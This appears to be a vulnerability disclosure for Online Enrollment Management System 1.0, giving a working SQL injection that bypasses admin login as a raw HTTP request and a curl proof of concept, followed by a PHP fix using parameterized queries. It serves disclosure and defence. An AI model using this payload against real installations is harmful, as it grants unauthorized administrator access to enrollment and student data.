Online Enrollment Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
# Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Admin panel authentication bypass
Admin panel authentication can be bypassed due to a SQL injection in the login form:
Request:
POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 63
Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q

user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin=
PoC:
curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php
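Mitigation sketch, added here as an example and not taken from the vendor's code: a login handler that binds `user_email` as a parameter, so the quote, `OR 1=1` and comment marker in the request above are compared as a literal string instead of being parsed as SQL. The table and column names (`admin_users`, `user_id`, `email`, `pass_hash`), the database credentials, the `index.php` redirect target and the use of `password_hash()` for stored passwords are assumptions; only the form field names come from the request shown above.

```php
<?php
declare(strict_types=1);

// Make mysqli throw exceptions instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Returns the admin's id on success, null on any failure.
// admin_users / user_id / email / pass_hash are hypothetical names.
function authenticate(mysqli $db, string $email, string $password): ?int
{
    // The ? placeholder sends the email to the server as data, separate from
    // the statement text, so it can never alter the WHERE clause.
    $stmt = $db->prepare(
        'SELECT user_id, pass_hash FROM admin_users WHERE email = ? LIMIT 1'
    );
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $stmt->bind_result($userId, $passHash);
    $found = $stmt->fetch();   // true = row fetched, null = no matching row
    $stmt->close();

    // The password is checked in PHP against a password_hash() value
    // (assumed storage format), never compared inside the SQL statement.
    if ($found !== true || !password_verify($password, (string) $passHash)) {
        return null;
    }
    return (int) $userId;
}

session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['btnLogin'])) {
    $email = $_POST['user_email'] ?? '';
    $pass  = $_POST['user_pass'] ?? '';
    if (!is_string($email) || !is_string($pass)) {   // reject array-valued fields
        http_response_code(400);
        exit;
    }
    // Connection parameters are placeholders.
    $db = new mysqli('127.0.0.1', 'app_user', 'app_password', 'enrollment_db');
    $db->set_charset('utf8mb4');
    $adminId = authenticate($db, $email, $pass);
    if ($adminId === null) {
        http_response_code(401);
        exit('Invalid email or password.');
    }
    session_regenerate_id(true);        // prevent session fixation after login
    $_SESSION['admin_id'] = $adminId;
    header('Location: index.php');      // hypothetical post-login page
    exit;
}
```

With this handler, the PoC request's `user_email` value matches no row and the login returns 401.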